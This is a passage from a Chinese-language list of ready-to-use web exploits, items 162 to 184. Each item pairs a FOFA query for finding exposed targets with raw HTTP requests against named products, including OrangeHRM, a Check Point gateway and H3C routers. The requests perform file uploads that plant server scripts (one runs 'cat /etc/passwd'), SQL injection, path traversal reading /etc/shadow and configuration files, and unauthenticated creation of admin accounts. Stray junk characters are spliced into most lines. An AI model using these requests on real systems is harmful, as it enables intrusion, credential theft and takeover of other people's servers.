1 m2 y0 d/ t" M/ Z8 ?<soap:Body>$ j' C7 p7 [5 L4 V A" \( T0 n9 _; f( X
<UploadResume xmlns="http://tempuri.org/">
5 x- ]! _$ l9 |0 }; u<ip>1</ip>
* F* A7 A; U3 ^6 k# ]4 t* J<fileName>../../../../dizxdell.aspx</fileName>5 {% z: `' i7 E: w
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
/ y) z8 J$ `; O+ ?( |<tag>3</tag>
# l. R0 \/ |& v/ p! X; C: B</UploadResume>
7 a7 d$ r9 i$ l& r! F4 K</soap:Body>% H' Q; l! \7 G7 i p
</soap:Envelope>
' |$ l, M' V0 j5 G& Z( G
1 a) f# b6 k8 k9 d" x/ X
; B5 a, \; s3 n; W( Q5 T) |http://x.x.x.x/dizxdell.aspx
7 g% R N" o+ S2 R/ a J1 o" i& D! [, a
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 Q, i7 e6 P( x5 l7 EFOFA: app="和丰山海-数字标牌"9 R7 ~. x, U* Y4 G
POST /QH.aspx HTTP/1.1
# x# \- G0 _4 o* F5 v7 @Host: x.x.x.x, j: ^6 N' x- G$ b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
" k$ T9 V3 f* y& z3 ?Connection: close$ {/ K. v' P$ u, @' a& ~% e: M+ F
Content-Length: 5832 j/ d" J( L9 q" k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
5 ?' Z% ?% _+ _% x; A* @" Z9 f1 vAccept-Encoding: gzip$ Z% y8 {& }! N& ^' o! \. f
2 E, I% `2 z) ], D7 ~5 ~------WebKitFormBoundaryeegvclmyurlotuey/ O& ]& `+ a. ~8 _9 M* A5 e F( f* A
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
, Z+ K! e/ H8 ?0 z) _Content-Type: application/octet-stream1 t, E8 V# v1 t1 G! J& z
! g$ p# N+ P2 J" K4 H
<% response.write("ujidwqfuuqjalgkvrpqy") %>/ \- G5 | J! T% E, ?4 ?
------WebKitFormBoundaryeegvclmyurlotuey; {$ ^& n4 c* T& W5 p4 s3 J5 ~
Content-Disposition: form-data; name="action"5 d' d- X( N" f5 T
: o. S5 W5 |: P' S/ B( f R2 Bupload; B" t% n% l* Q" I B1 D5 x3 ^/ u
------WebKitFormBoundaryeegvclmyurlotuey) x6 `$ ]: W r+ f" O( S/ C$ A
Content-Disposition: form-data; name="responderId"
2 A/ d: A9 i3 T7 S: j* n: k4 L# @" t- v3 Q
ResourceNewResponder8 O4 M; w! K/ v* ^1 I8 p
------WebKitFormBoundaryeegvclmyurlotuey
% z# ~% X: m1 J8 g7 W/ C; HContent-Disposition: form-data; name="remotePath"
2 C- R) ?5 _2 w& P/ ?$ m! f% ~* g7 H% J( h& P1 c
/opt/resources: Z4 v$ h+ R K# v3 w v1 `
------WebKitFormBoundaryeegvclmyurlotuey--6 s, y6 ]% @1 t2 o
# I% v4 Q+ v |! H& X
& k! s6 F' Q8 k! v, i
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
# f0 ~ x9 ~. v& s! b' K2 e3 ~9 |- e6 f( C6 q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 ~, \( `2 }# C
FOFA: icon_hash="-795291075"
5 ~ R# `- |: [0 `3 p" ^POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1: Q5 g5 c, }4 G G! b8 B k
Host: x.x.x.x
! Y1 e$ V& Z4 m, @8 p( c! E9 |7 X uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.367 \; t3 ~8 }. M2 j; |3 H) u9 s5 E
Connection: close
" T. D; O2 j. _/ P# IContent-Length: 293& V" I4 a" |0 z7 h
Accept: */*+ o1 q3 ~, z' e# c
Accept-Encoding: gzip, deflate
( Z; u Y2 S% V' l* W* oAccept-Language: zh-CN,zh;q=0.9# o+ i+ B& R/ d' c! w. P
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod; w( ?9 Z F" _2 m- w
/ ^9 i. ^" g% d# K------iiqvnofupvhdyrcoqyuujyetjvqgocod8 X$ I) P. e) D! X
Content-Disposition: form-data; name="name"
( ?6 `+ J2 A: b4 F& x4 k# v
. n2 L- {) {, ?5 d% @) V1.php* T+ b- ?1 w6 m$ _9 E' C& s" C
------iiqvnofupvhdyrcoqyuujyetjvqgocod* f! z! S6 a. `' K- m8 c$ r3 |
Content-Disposition: form-data; name="upfile"; filename="1.php"1 l0 V: G8 a5 y" H& W
Content-Type: image/jpeg% `. e- m! w2 Q
+ U( }) K; q" j" }4 k
rvjhvbhwwuooyiioxega
7 l- V3 A6 U/ x$ e& q------iiqvnofupvhdyrcoqyuujyetjvqgocod--
' F1 h& v: Q& l, X) P9 j! L' R1 q1 F* c
- N6 t+ ?- ~$ [% G% \, J- L4 ^2 V& k
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
0 X- D5 ]3 T$ q1 _" s/ |) dFOFA: title="智慧综合管理平台登入"
4 I" j- k. x9 _7 x- s8 L8 B5 ^* WPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# l+ |0 f9 k6 H6 Y" H' B+ U" J
Host: x.x.x.x0 S1 c2 \7 ?% f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' ]( D5 N% [* s% S$ Q' V. Z: S8 d5 U
Content-Length: 288$ z9 |9 V; \1 Z2 Y6 p+ O' y
Accept: application/json, text/javascript, */*; q=0.01
0 W$ Z6 N2 N, s$ n( f0 C7 e! nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
0 R$ B" L$ @- N2 xConnection: close |' A3 `5 f; X# ?0 L8 t( }
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl+ [0 y/ z' R5 C' E7 p
X-Requested-With: XMLHttpRequest9 f8 V2 o0 K# b/ H; M9 T& T: O
Accept-Encoding: gzip
( \7 D$ \5 D# R `
0 s0 S, W+ c5 I: S2 n: l7 r; A R------dqdaieopnozbkapjacdbdthlvtlyl1 S2 Q2 P% i0 ~' J. k2 O) _
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
8 |1 w2 \; s {4 J$ Q: h- a: NContent-Type: image/jpeg/ z3 K9 G6 R+ F! J
! A) b6 t% [% c
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>6 R; [9 f* ~( M( M% v" ~7 [. I
------dqdaieopnozbkapjacdbdthlvtlyl--
: J3 w% w' W$ N3 S$ A" A- A! {; I4 ]
2 \$ `1 J1 H, s
9 c. |, Z! ?6 b) H$ rhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
' a5 S2 u4 m* g8 u; J* m$ I3 W
2 M* I$ K' y0 v9 G3 g4 q+ I* ]165. OrangeHRM 3.3.3 SQL 注入. q6 p, X: p ] X! r
CVE-2024-364282 [+ V j( q5 @( `7 N% M
FOFA: app="OrangeHRM-产品"$ |) c1 C, q. ~ D$ `
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
" U! |5 l/ d1 A. g8 J& G. |/ D' ^
* P8 k w4 g$ K( H
2 o8 c( u0 w9 g4 q166. 中成科信票务管理平台SeatMapHandler SQL注入3 }0 D! [$ K5 Q8 N% @
FOFA:body="技术支持:北京中成科信科技发展有限公司"% M& G( T5 |/ P* |( d1 [ h
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.13 @/ |0 x: S7 F& t X
Host:
& S3 ~; [+ |( o+ N+ T0 `Pragma: no-cache
7 s+ E3 w1 k7 H" g( i5 S NCache-Control: no-cache5 S. A0 K$ U& J, n( J
Upgrade-Insecure-Requests: 1( {: a3 Y% J+ s- U0 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
8 J' B. h& r: u7 o1 j; C. fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* G5 Q" E/ [) {" S' l5 ?- v
Accept-Encoding: gzip, deflate8 F( \9 H; ~' c5 _6 o. F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
7 v5 o4 _# S) s) s+ {Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE1 ?$ c3 ^( i' q+ U
Connection: close: j& ]2 L* J+ b. ~9 K# t+ F
Content-Type: application/x-www-form-urlencoded% g" z: A& |# {0 G4 }* n$ M
Content-Length: 89, l# ]0 I0 K. T
. [1 g7 b6 W ]# ]) s6 b! Y
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
9 `: ^4 ^8 W7 T- m- ?9 L
: \ [& {% f3 F9 T; W
" t5 ~+ t& ?/ V% }. [167. 精益价值管理系统 DownLoad.aspx任意文件读取/ [' C! x' D3 ~3 U2 Z: N" u
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"/ { K) P6 N m# @5 C: ?6 M
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
+ ~' {/ h, r2 W: H* J! w- Y4 s O* }Host:! s+ m6 I/ [$ y3 A: F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! {8 R+ g7 Q5 I& `% D1 dContent-Type: application/x-www-form-urlencoded
# }6 Z9 r% ]4 D$ P# H5 Z2 X6 F, _( JAccept-Encoding: gzip, deflate) b z1 U3 P* A/ g* o7 R* i0 k% |
Accept: */*3 K' L$ w& ]1 A! m
Connection: keep-alive: n5 Y3 P3 C+ j' P, [( `
4 v5 \1 H c1 z- ]
3 x) @6 z- x# l
168. 宏景EHR OutputCode 任意文件读取
" S# N: z7 ~- @, J, lFOFA:app="HJSOFT-HCM"1 n4 }9 c- c' R4 h
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
% {4 X7 y1 j' y# ~5 `( H: T2 KHost: your-ip
$ L7 }8 Y7 S* NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
- R0 m# E4 G$ V0 M& d+ Q, IContent-Type: application/x-www-form-urlencoded! b" O6 B5 k/ B) K& E
Connection: close
9 Z' ^% a; [& _2 r H x1 k4 F; ]0 W# X" d Z1 ?
u& l, n; ~1 I( V
$ {. S5 {. ^6 i+ K$ K6 W
169. 宏景EHR downlawbase SQL注入
; ]: x+ R6 [1 ?. n$ v. J1 NFOFA:app="HJSOFT-HCM"
# j* f/ r# T# e4 T* cGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1( }3 c$ W$ a( v" U2 C; t0 v# `$ h
Host: your-ip
* k9 c* k# {6 \" j# y, Z% _! ~% \% wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, b' H- P5 p! I
Accept: */*
2 K I; ~( G' ~4 }" n! y* f$ H8 }Accept-Encoding: gzip, deflate
" x |0 X/ s" u$ g$ tConnection: close
$ I/ O* M( K7 t$ j8 p5 R( J8 \% B% |( L: M% S! Z( `8 x$ ~. k
3 I4 A! P4 P2 y5 E- e3 @1 k, n m2 Y- h. a4 M/ @# H+ G( B) l3 n
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
4 ]7 } J% t' Q1 a$ YFOFA:body="/general/sys/hjaxmanage.js"
5 l. a4 t3 Q% i h- ^' rPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1$ P, {& L6 q' z9 I% w4 {
Host: balalanengliang
+ W6 n' K5 d/ u: \# e/ OUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& k3 a4 ?, @3 }2 v6 D; i6 `8 e
Content-Type: application/x-www-form-urlencoded+ p8 }% Y. `/ s% V6 T5 s2 L
) y& ]/ }4 B3 d, d. N
filename=../webapps/ROOT/WEB-INF/web.xml
+ D {) d6 u0 Z
" V* a3 }/ @ }( t, b9 M5 z/ `. @- X
9 H! {. S- m5 A$ F, Q171. 通天星CMSV6车载定位监控平台 SQL注入
y/ x9 ^" U/ X1 C% R+ j6 OFOFA:body="/808gps/"
& T' f% e; J, x0 [3 P. d }GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
3 d& ~3 z) X* e( LHost: your-ip$ R$ p8 x! A' {+ v# F: C9 e v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 h2 n3 a, T4 ^( ~7 s# {Accept: */*! i: w8 d, R2 O3 Q6 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ Y7 k9 M; ^; u0 N1 J5 qAccept-Encoding: gzip, deflate' ?' h5 c+ v% n- h
Connection: close+ v& Z1 ]2 ?3 O- X% e
+ ]0 k- k4 F. w
+ s2 X8 ]( e% `8 }4 ]
. t: t1 |5 L% V9 x172. DT-高清车牌识别摄像机任意文件读取# H$ W [5 X+ J! c$ H
FOFA:app="DT-高清车牌识别摄像机"
+ v+ v: ~" v' r' j4 zGET /../../../../etc/passwd HTTP/1.10 ?1 `. x/ X4 _- P3 ~5 O2 V( K
Host: your-ip |& Q$ }4 H! M0 Z/ O8 f# `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" q2 U- m, w* F) ?, B1 M2 f; X' A
Accept-Encoding: gzip, deflate
- B' G2 r) `5 y' [% [" p( V4 P hAccept: */*- G9 y" g4 }4 t+ S& c* q; J
Connection: keep-alive8 I& b8 u! ?, Q& h5 \; Z; a
6 w" R. V5 o& F# y1 _ z% @
2 [! r( g3 u0 V9 o- \) J% G
" z2 O0 x' a: A& g# R* g173. Check Point 安全网关任意文件读取- X; A5 j3 h; D( S
CVE-2024-24919. k2 M- {- W7 E. V" Q" \; ~2 i! F. t
FOFA:app="Check_Point-SSL-Network-Extender"6 V4 N9 ]' E7 T! m
POST /clients/MyCRL HTTP/1.1
/ T, \4 N/ u& r" x6 y( cHost: your-ip6 G0 _9 W% P0 H: _ P/ H
Content-Type: application/x-www-form-urlencoded2 @6 Q+ Y3 t: f7 y- c
) t) F" g& ~+ n( baCSHELL/../../../../../../../etc/shadow1 B) N0 @8 ]5 y# ^/ Q; ]* }) R
7 G* M3 a9 [: K0 A2 I! H: |, Z- i
3 H2 b) y% @7 j! @; R1 F, X& h' t( b \9 q) f' N9 Y
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% b# o* k9 l3 [* T h: {FOFA:app="金和网络-金和OA"* I! F) j% S, B! H8 Z) F0 b
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
0 @! w0 x7 W! D' q' V: D- fHost: your-ip
( h! u, Y$ ]' Y. o0 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! c& f8 x5 I9 |2 o: G6 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 W( B9 a+ m7 M* e
Accept-Encoding: gzip, deflate, br
; C9 G# S/ Y, M. ` mAccept-Language: zh-CN,zh;q=0.9, v, {, ]& R( r/ U, G
Connection: close
& D! |* A& W C! n. D4 f, K; p% X& m! F$ u1 v/ J
) S" R. |6 p$ U
6 n* d, @! R- o% T175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
+ X/ \. d r3 C1 wFOFA:app="金和网络-金和OA"& J, H# h" F H8 G. x: h: ?
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 x! y5 {" D9 G' p
Host:& h4 S' Y4 @0 x( D
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ E F8 R8 j+ h6 [$ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: l$ ^% v, j. j, Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ]& P. T: ~* I8 L7 v
Accept-Encoding: gzip, deflate# P* t% q& @( j1 L1 Y* E
Connection: close
3 t& P& C! c0 J: Y+ G( r& T% c6 |: EUpgrade-Insecure-Requests: 1
% e! L1 n" U( ?! F3 {) @3 ~) e2 `7 N7 J# a# m6 x' ~- w
$ j' s0 p' s) L7 j( ]) b176. 电信网关配置管理系统 rewrite.php 文件上传7 [8 J$ a4 K/ q# j; c
FOFA:body="img/login_bg3.png" && body="系统登录"% h, l- X0 C5 [$ E8 z& B
POST /manager/teletext/material/rewrite.php HTTP/1.1
" s! [. O, B1 h3 b/ _, zHost: your-ip
( v* \$ Q/ n o0 v* \. r$ b) nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
# x5 a1 S, l& J$ p0 MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
7 u% V/ ^9 V% p: M. ] u7 IConnection: close' ^1 w9 x. c6 ]/ Q
3 p% O4 W$ e" W# m
------WebKitFormBoundaryOKldnDPT, y0 G& ?- L& X
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
4 }7 a) C! q6 f- `* C0 J: [6 s9 PContent-Type: image/png
( e4 ]' c4 }+ l/ G0 A, D ( g9 j5 X7 `' ^4 u* e9 v- Z/ ]
<?php system("cat /etc/passwd");unlink(__FILE__);?># p, I4 ?3 g& I! ?; [1 v' G! L2 ?
------WebKitFormBoundaryOKldnDPT
5 `6 ~. R4 t: R" H+ h" h( F, w. }5 DContent-Disposition: form-data; name="uploadtime"
% C. W, \# p8 }8 r- E 4 K2 X* o0 k& A, y
$ n" s, r' H. c3 i6 a------WebKitFormBoundaryOKldnDPT--2 o. E0 l1 w8 d$ @9 q! ?
' G& }- o9 k% j* f4 \0 r' z& Z7 u Q& w% W
# U |7 j; o2 j0 o& ]* p1 `
177. H3C路由器敏感信息泄露0 Z# f5 S1 N4 w0 o" F: L# b6 p
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg$ q$ n5 h8 X( Z( j+ |- W$ q
/userLogin.asp/../actionpolicy_status/../M60.cfg7 ~! {- b5 R) W: ?/ A6 a3 W
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
9 t0 X' l8 c" C) f; W/userLogin.asp/../actionpolicy_status/../GR5200.cfg
, A" S& \8 V& s! N1 T+ P6 {- P# ^/userLogin.asp/../actionpolicy_status/../GR3200.cfg( C2 ~, d2 e l; g
/userLogin.asp/../actionpolicy_status/../GR2200.cfg% }) p8 r- _! ?0 e. I
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg( V7 A- K1 M7 F& |; ~
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
* `. O# S; Z0 v4 O* e/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg4 F& D2 s, k! c2 R i0 j+ C
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
f3 F' h7 u% S; o( R# d% G/userLogin.asp/../actionpolicy_status/../ER5200.cfg6 L. h- S% Y$ _: L; A3 J4 n
/userLogin.asp/../actionpolicy_status/../ER5100.cfg$ l/ c+ H; D: L0 ]! G: D
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
! K' p9 p& |3 O7 T5 s* s3 n/userLogin.asp/../actionpolicy_status/../ER3260.cfg
) r- o7 c' `0 [* N* n7 o: D/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
6 z+ q2 H* E" C) Y- [/userLogin.asp/../actionpolicy_status/../ER3200.cfg
: P$ h" x2 F b4 c' x1 `/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
- [; `4 M# }9 X3 h: A% V. [/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
( d& m% }' g1 y i$ u* v4 P/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
+ s! @8 s4 I) m0 ?) ~/userLogin.asp/../actionpolicy_status/../ER3100.cfg' u2 y0 o& e" [3 Y8 Q
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg/ P! ?( l. @ B2 S% T4 n0 T
4 A1 e$ L. f4 o9 j
+ F3 Z# a: S4 y5 a( `178. H3C校园网自助服务系统-flexfileupload-任意文件上传
" y. I5 p( |/ [! N1 Q& LFOFA:header="/selfservice"
% m; e" z, L QPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
9 f8 s1 ~8 }, C. }5 z( R3 v: V( {Host:
, b3 t% Y/ g: J% A( _/ P1 z uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: }/ @" P5 p' O( F# e9 q
Content-Length: 252
4 E% v+ T+ { k* ^Accept-Encoding: gzip, deflate+ K" n+ W! ]+ C. O; }# b
Connection: close
" Y- l: c9 Y: n& r: CContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l0 R" c* V- \# C& K5 O' d& X# ]
-----------------aqutkea7vvanpqy3rh2l% G! t- s7 {, u2 a
Content-Disposition: form-data; name="12234.txt"; filename="12234"5 o# C1 R$ a3 _/ u2 i% z
Content-Type: application/octet-stream
; A' T) C' Y6 W/ t* e, AContent-Length: 255# _ W2 \, U3 B. g7 ^
7 @( \! J! z C
122349 v' o6 F, w6 R+ _$ N% ]# k- m# I
-----------------aqutkea7vvanpqy3rh2l--
, W1 ]6 B! B$ [1 H, r* k4 r% c& j8 n# }8 W1 p6 G! U
- B9 K: k) V/ l& p- j3 v3 {6 r
GET /imc/primepush/%2e%2e/flex/12234.txt
c+ }, v* i% U
2 }* K+ V x5 q$ x+ K6 g9 C9 u4 Y2 N# t6 j
179. 建文工程管理系统存在任意文件读取
; O& }' q- U3 m+ v3 m) t* ~8 K) f1 rPOST /Common/DownLoad2.aspx HTTP/1.1) L: L, N2 d* m9 ]& K9 A
Host: {{Hostname}}+ N" [& S4 D$ W" t% P O) C
Content-Type: application/x-www-form-urlencoded) w2 C ] S9 Y
User-Agent: Mozilla/5.0( k' j7 y, l9 y1 L0 w. f
, o- h/ O9 b( U
path=../log4net.config&Name=& q2 w) ]% i' O- w. m- b
. V8 ]; D/ }, q" ]/ u( V
6 T- ?, @; S' v1 y' D* t/ O0 t/ n) T180. 帮管客 CRM jiliyu SQL注入6 o3 _( n& x6 h' A2 Y }3 M
FOFA:app="帮管客-CRM"
0 v& w# B* y- j3 qGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 @, f- S0 G# s( w7 A
Host: your-ip2 ^3 ]! _2 C+ ]) e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 k% R b# O' R" B" DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) y n4 s) J! O! X3 x
Accept-Encoding: gzip, deflate, X5 U( s( |# ]; T4 y% m0 [
Accept-Language: zh-CN,zh;q=0.9( T' ]/ m# S: i
Connection: close
* [5 K* i+ H6 T7 g' L$ B" j. W6 Z
/ Q9 e" Y2 y( ^% N' |1 i
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入5 z6 ~) S! W5 W- y: ~' \, i
FOFA:"PDCA/js/_publicCom.js") O8 v/ b$ w1 n: |( H
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
! q9 @$ Z; J) lHost: your-ip
) R) o& g/ H2 n, W% G- FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& H. `3 r& ~7 J8 T9 V0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 h! N/ L0 t! J
Accept-Encoding: gzip, deflate, br
: z" v$ C1 d" r9 d4 L3 J8 B+ sAccept-Language: zh-CN,zh;q=0.9
% M# y6 L f2 v* I. m4 ]% }Connection: close
) J/ e9 {. c3 C& qContent-Type: application/x-www-form-urlencoded
2 y! ~0 I& `7 v4 I1 b6 B; k9 e) n- y1 m
) r' R7 ?* s1 r9 }! b
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
( `# p8 _2 g0 G9 U/ B/ e+ k" k* s) d: W$ c/ ]4 Z/ {
' z/ y) K+ H5 Y182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 x- g" P# f2 c" Q' N6 |5 v
FOFA:"PDCA/js/_publicCom.js"% t9 y! U7 q; D1 Q) C; R4 b. v
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
) l$ J* `; ?$ i* pHost: your-ip
1 v0 i$ k9 \" O nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ k4 Q/ N+ U4 L) Z6 G2 [/ J" ~( HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! F7 g3 I7 g, T1 w" VAccept-Encoding: gzip, deflate, br
, ?: f" j; b. z& i. xAccept-Language: zh-CN,zh;q=0.9
7 @: K; g7 P5 MConnection: close A( i( Y8 c, ?- E0 a
Content-Type: application/x-www-form-urlencoded1 i* J& Y5 V: N1 d$ t8 K
' g0 l9 [, l+ h8 }8 z
, A7 F' `2 F# q, r1 s& N9 M
username=test1234&pwd=test1234&savedays=13 s" s/ F- L& ]
5 V2 k0 ~5 w! y) i
! K. m D% E0 S0 u9 w183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
# P2 ^! s% x- K8 ?FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面". ^/ G, Y u/ @+ e3 Q
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1. B6 F& q4 K5 j" [+ _2 W% |
Host: your-ip, ~: e% q# a* G0 Q R8 L. X5 T
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ B& C ?# W# k4 v; BAccept-Charset: utf-85 W* A8 d3 j) J
Accept-Encoding: gzip, deflate
+ v) g0 m1 A( W. V QConnection: close
( a; B( {& W S$ c" w! x6 T( K0 }
* t1 U: B& |# C! U: d6 v0 k
) H8 Z" T* d5 f3 N7 E7 W# ~6 G! R184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" O- M+ n; y [; ?8 U" V* H" M
FOFA:server="SunFull-Webs"
( a$ j( j% `7 L- u" a1 r1 iPOST /soap/AddUser HTTP/1.1
6 X3 A8 @3 F4 w5 XHost: your-ip
& n& d' F E; z# K- |Accept-Encoding: gzip, deflate: F; I/ @& O8 E8 H c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- [; O( y9 D" N' S# H# B
Accept: application/xml, text/xml, */*; q=0.01$ Z# ], ]( o& B0 L% ~! R! ~
Content-Type: text/xml; charset=utf-8% ~* K. z9 _$ M3 C/ G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 A8 i8 P) ?" K6 N1 R' e+ _* f
X-Requested-With: XMLHttpRequest
. k) s+ F, c1 j' L% B3 U( z* C L* G# F; R
! _& c! n- h% L i( L- N
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')( o" E0 r: f/ E9 d
